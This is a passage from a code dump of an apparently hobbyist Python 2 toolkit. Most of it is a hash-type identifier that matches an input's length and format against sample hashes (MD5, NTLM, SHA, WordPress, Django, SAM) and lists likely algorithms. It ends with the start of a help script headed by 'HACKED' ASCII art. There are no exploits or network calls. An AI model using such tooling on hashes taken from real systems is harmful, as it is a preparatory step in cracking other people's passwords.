MD2HMAC(): 142 | hs='4b61b72ead2b0eb0fa3b8a56556a6dca' 143 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 144 | jerar.append("106120") 145 | def MD4(): 146 | hs='a2acde400e61410e79dacbdfc3413151' 147 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 148 | jerar.append("106040") 149 | def MD4HMAC(): 150 | hs='6be20b66f2211fe937294c1c95d1cd4f' 151 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 152 | jerar.append("106100") 153 | def MD5(): 154 | hs='ae11fd697ec92c7c98de3fac23aba525' 155 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 156 | jerar.append("106020") 157 | def MD5HMAC(): 158 | hs='d57e43d2c7e397bf788f66541d6fdef9' 159 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 160 | jerar.append("106080") 161 | def MD5HMACWordpress(): 162 | hs='3f47886719268dfa83468630948228f6' 163 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 164 | jerar.append("106140") 165 | def NTLM(): 166 | hs='cc348bace876ea440a28ddaeb9fd3550' 167 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 168 | jerar.append("106029") 169 | def RAdminv2x(): 170 | hs='baea31c728cbf0cd548476aa687add4b' 171 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 172 | jerar.append("106027") 173 | def RipeMD128(): 174 | hs='4985351cd74aff0abc5a75a0c8a54115' 175 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 176 | jerar.append("106180") 177 | def RipeMD128HMAC(): 178 | hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' 179 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 180 | jerar.append("106185") 181 | def SNEFRU128(): 182 | hs='4fb58702b617ac4f7ca87ec77b93da8a' 183 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 184 | jerar.append("106200") 185 | def SNEFRU128HMAC(): 186 | hs='59b2b9dcc7a9a7d089cecf1b83520350' 187 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 188 | jerar.append("106205") 189 | def Tiger128(): 190 | hs='c086184486ec6388ff81ec9f23528727' 191 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 192 | jerar.append("106220") 193 | def Tiger128HMAC(): 194 | hs='c87032009e7c4b2ea27eb6f99723454b' 195 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 196 | jerar.append("106225") 197 | def md5passsalt(): 198 | hs='5634cc3b922578434d6e9342ff5913f7' 199 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 200 | jerar.append("106240") 201 | def md5saltmd5pass(): 202 | hs='245c5763b95ba42d4b02d44bbcd916f1' 203 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 204 | jerar.append("106260") 205 | def md5saltpass(): 206 | hs='22cc5ce1a1ef747cd3fa06106c148dfa' 207 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 208 | jerar.append("106280") 209 | def md5saltpasssalt(): 210 | hs='469e9cdcaff745460595a7a386c4db0c' 211 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 212 | jerar.append("106300") 213 | def md5saltpassusername(): 214 | hs='9ae20f88189f6e3a62711608ddb6f5fd' 215 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 216 | jerar.append("106320") 217 | def md5saltmd5pass(): 218 | hs='aca2a052962b2564027ee62933d2382f' 219 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 220 | jerar.append("106340") 221 | def md5saltmd5passsalt(): 222 | hs='de0237dc03a8efdf6552fbe7788b2fdd' 223 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 224 | jerar.append("106360") 225 | def md5saltmd5passsalt(): 226 | hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' 227 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 228 | jerar.append("106380") 229 | def md5saltmd5saltpass(): 230 | hs='d8f3b3f004d387086aae24326b575b23' 231 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 232 | jerar.append("106400") 233 | def md5saltmd5md5passsalt(): 234 | hs='81f181454e23319779b03d74d062b1a2' 235 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 236 | jerar.append("106420") 237 | def md5username0pass(): 238 | hs='e44a60f8f2106492ae16581c91edb3ba' 239 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 240 | jerar.append("106440") 241 | def md5usernameLFpass(): 242 | hs='654741780db415732eaee12b1b909119' 243 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 244 | jerar.append("106460") 245 | def md5usernamemd5passsalt(): 246 | hs='954ac5505fd1843bbb97d1b2cda0b98f' 247 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 248 | jerar.append("106480") 249 | def md5md5pass(): 250 | hs='a96103d267d024583d5565436e52dfb3' 251 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 252 | jerar.append("106500") 253 | def md5md5passsalt(): 254 | hs='5848c73c2482d3c2c7b6af134ed8dd89' 255 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 256 | jerar.append("106520") 257 | def md5md5passmd5salt(): 258 | hs='8dc71ef37197b2edba02d48c30217b32' 259 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 260 | jerar.append("106540") 261 | def md5md5saltpass(): 262 | hs='9032fabd905e273b9ceb1e124631bd67' 263 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 264 | jerar.append("106560") 265 | def md5md5saltmd5pass(): 266 | hs='8966f37dbb4aca377a71a9d3d09cd1ac' 267 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 268 | jerar.append("106580") 269 | def md5md5usernamepasssalt(): 270 | hs='4319a3befce729b34c3105dbc29d0c40' 271 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 272 | jerar.append("106600") 273 | def md5md5md5pass(): 274 | hs='ea086739755920e732d0f4d8c1b6ad8d' 275 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 276 | jerar.append("106620") 277 | def md5md5md5md5pass(): 278 | hs='02528c1f2ed8ac7d83fe76f3cf1c133f' 279 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 280 | jerar.append("106640") 281 | def md5md5md5md5md5pass(): 282 | hs='4548d2c062933dff53928fd4ae427fc0' 283 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 284 | jerar.append("106660") 285 | def md5sha1pass(): 286 | hs='cb4ebaaedfd536d965c452d9569a6b1e' 287 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 288 | jerar.append("106680") 289 | def md5sha1md5pass(): 290 | hs='099b8a59795e07c334a696a10c0ebce0' 291 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 292 | jerar.append("106700") 293 | def md5sha1md5sha1pass(): 294 | hs='06e4af76833da7cc138d90602ef80070' 295 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 296 | jerar.append("106720") 297 | def md5strtouppermd5pass(): 298 | hs='519de146f1a658ab5e5e2aa9b7d2eec8' 299 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 300 | jerar.append("106740") 301 | 302 | def LineageIIC4(): 303 | hs='0x49a57f66bd3d5ba6abda5579c264a0e4' 304 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: 305 | jerar.append("107080") 306 | def MD5phpBB3(): 307 | hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' 308 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: 309 | jerar.append("107040") 310 | def MD5Unix(): 311 | hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' 312 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: 313 | jerar.append("107060") 314 | def MD5Wordpress(): 315 | hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' 316 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: 317 | jerar.append("107020") 318 | 319 | def MD5APR(): 320 | hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' 321 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: 322 | jerar.append("108020") 323 | 324 | def Haval160(): 325 | hs='a106e921284dd69dad06192a4411ec32fce83dbb' 326 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 327 | jerar.append("109100") 328 | def Haval160HMAC(): 329 | hs='29206f83edc1d6c3f680ff11276ec20642881243' 330 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 331 | jerar.append("109200") 332 | def MySQL5(): 333 | hs='9bb2fb57063821c762cc009f7584ddae9da431ff' 334 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 335 | jerar.append("109040") 336 | def MySQL160bit(): 337 | hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' 338 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: 339 | jerar.append("109060") 340 | def RipeMD160(): 341 | hs='dc65552812c66997ea7320ddfb51f5625d74721b' 342 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 343 | jerar.append("109120") 344 | def RipeMD160HMAC(): 345 | hs='ca28af47653b4f21e96c1235984cb50229331359' 346 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 347 | jerar.append("109180") 348 | def SHA1(): 349 | hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' 350 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 351 | jerar.append("109020") 352 | def SHA1HMAC(): 353 | hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' 354 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 355 | jerar.append("109140") 356 | def SHA1MaNGOS(): 357 | hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' 358 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 359 | jerar.append("109220") 360 | def SHA1MaNGOS2(): 361 | hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' 362 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 363 | jerar.append("109240") 364 | def Tiger160(): 365 | hs='c086184486ec6388ff81ec9f235287270429b225' 366 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 367 | jerar.append("109080") 368 | def Tiger160HMAC(): 369 | hs='6603161719da5e56e1866e4f61f79496334e6a10' 370 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 371 | jerar.append("109160") 372 | def sha1passsalt(): 373 | hs='f006a1863663c21c541c8d600355abfeeaadb5e4' 374 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 375 | jerar.append("109260") 376 | def sha1saltpass(): 377 | hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' 378 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 379 | jerar.append("109280") 380 | def sha1saltmd5pass(): 381 | hs='860465ede0625deebb4fbbedcb0db9dc65faec30' 382 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 383 | jerar.append("109300") 384 | def sha1saltmd5passsalt(): 385 | hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' 386 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 387 | jerar.append("109320") 388 | def sha1saltsha1pass(): 389 | hs='58714327f9407097c64032a2fd5bff3a260cb85f' 390 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 391 | jerar.append("109340") 392 | def sha1saltsha1saltsha1pass(): 393 | hs='cc600a2903130c945aa178396910135cc7f93c63' 394 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 395 | jerar.append("109360") 396 | def sha1usernamepass(): 397 | hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' 398 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 399 | jerar.append("109380") 400 | def sha1usernamepasssalt(): 401 | hs='00025111b3c4d0ac1635558ce2393f77e94770c5' 402 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 403 | jerar.append("109400") 404 | def sha1md5pass(): 405 | hs='fa960056c0dea57de94776d3759fb555a15cae87' 406 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 407 | jerar.append("1094202") 408 | def sha1md5passsalt(): 409 | hs='1dad2b71432d83312e61d25aeb627593295bcc9a' 410 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 411 | jerar.append("109440") 412 | def sha1md5sha1pass(): 413 | hs='8bceaeed74c17571c15cdb9494e992db3c263695' 414 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 415 | jerar.append("109460") 416 | def sha1sha1pass(): 417 | hs='3109b810188fcde0900f9907d2ebcaa10277d10e' 418 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 419 | jerar.append("109480") 420 | def sha1sha1passsalt(): 421 | hs='780d43fa11693b61875321b6b54905ee488d7760' 422 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 423 | jerar.append("109500") 424 | def sha1sha1passsubstrpass03(): 425 | hs='5ed6bc680b59c580db4a38df307bd4621759324e' 426 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 427 | jerar.append("109520") 428 | def sha1sha1saltpass(): 429 | hs='70506bac605485b4143ca114cbd4a3580d76a413' 430 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 431 | jerar.append("109540") 432 | def sha1sha1sha1pass(): 433 | hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' 434 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 435 | jerar.append("109560") 436 | def sha1strtolowerusernamepass(): 437 | hs='79f575543061e158c2da3799f999eb7c95261f07' 438 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 439 | jerar.append("109580") 440 | 441 | def Haval192(): 442 | hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' 443 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 444 | jerar.append("110040") 445 | def Haval192HMAC(): 446 | hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' 447 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 448 | jerar.append("110080") 449 | def Tiger192(): 450 | hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' 451 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 452 | jerar.append("110020") 453 | def Tiger192HMAC(): 454 | hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' 455 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 456 | jerar.append("110060") 457 | 458 | def MD5passsaltjoomla1(): 459 | hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' 460 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: 461 | jerar.append("112020") 462 | 463 | def SHA1Django(): 464 | hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' 465 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: 466 | jerar.append("113020") 467 | 468 | def Haval224(): 469 | hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' 470 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 471 | jerar.append("114040") 472 | def Haval224HMAC(): 473 | hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' 474 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 475 | jerar.append("114080") 476 | def SHA224(): 477 | hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' 478 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 479 | jerar.append("114020") 480 | def SHA224HMAC(): 481 | hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' 482 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 483 | jerar.append("114060") 484 | 485 | def SHA256(): 486 | hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' 487 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 488 | jerar.append("115020") 489 | def SHA256HMAC(): 490 | hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' 491 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 492 | jerar.append("115120") 493 | def Haval256(): 494 | hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' 495 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 496 | jerar.append("115040") 497 | def Haval256HMAC(): 498 | hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' 499 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 500 | jerar.append("115140") 501 | def GOSTR341194(): 502 | hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' 503 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 504 | jerar.append("115060") 505 | def RipeMD256(): 506 | hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' 507 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 508 | jerar.append("115080") 509 | def RipeMD256HMAC(): 510 | hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' 511 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 512 | jerar.append("115160") 513 | def SNEFRU256(): 514 | hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' 515 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 516 | jerar.append("115100") 517 | def SNEFRU256HMAC(): 518 | hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' 519 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 520 | jerar.append("115180") 521 | def SHA256md5pass(): 522 | hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' 523 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 524 | jerar.append("115200") 525 | def SHA256sha1pass(): 526 | hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' 527 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 528 | jerar.append("115220") 529 | 530 | def MD5passsaltjoomla2(): 531 | hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' 532 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: 533 | jerar.append("116020") 534 | def SAM(): 535 | hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' 536 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: 537 | jerar.append("116040") 538 | 539 | def SHA256Django(): 540 | hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' 541 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: 542 | jerar.append("117020") 543 | 544 | def RipeMD320(): 545 | hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' 546 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 547 | jerar.append("118020") 548 | def RipeMD320HMAC(): 549 | hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' 550 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 551 | jerar.append("118040") 552 | 553 | def SHA384(): 554 | hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' 555 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 556 | jerar.append("119020") 557 | def SHA384HMAC(): 558 | hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' 559 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 560 | jerar.append("119040") 561 | 562 | def SHA256s(): 563 | hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' 564 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: 565 | jerar.append("120020") 566 | 567 | def SHA384Django(): 568 | hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' 569 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: 570 | print " [+] SHA-384(Django)" 571 | jerar.append("121020") 572 | 573 | def SHA512(): 574 | hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' 575 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 576 | jerar.append("122020") 577 | def SHA512HMAC(): 578 | hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' 579 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 580 | jerar.append("122060") 581 | def Whirlpool(): 582 | hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' 583 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 584 | jerar.append("122040") 585 | def WhirlpoolHMAC(): 586 | hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' 587 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 588 | jerar.append("122080") 589 | 590 | 591 | print logo 592 | while True: 593 | jerar=[] 594 | print """ 595 | -------------------------------------------------------------------------""" 596 | hash = raw_input(" HASH: ") 597 | ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() 598 | 599 | if len(jerar)==0: 600 | print "" 601 | print " Not Found." 602 | elif len(jerar)>2: 603 | jerar.sort() 604 | print "" 605 | print "Possible Hashs:" 606 | print "[+] ",algorithms[jerar[0]] 607 | print "[+] ",algorithms[jerar[1]] 608 | print "" 609 | print "Least Possible Hashs:" 610 | for a in range(int(len(jerar))-2): 611 | print "[+] ",algorithms[jerar[a+2]] 612 | else: 613 | jerar.sort() 614 | print "" 615 | print "Possible Hashs:" 616 | for a in range(len(jerar)): 617 | print "[+] ",algorithms[jerar[a]] 618 | 619 | hashid() 620 | -------------------------------------------------------------------------------- /commandlist/help.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | 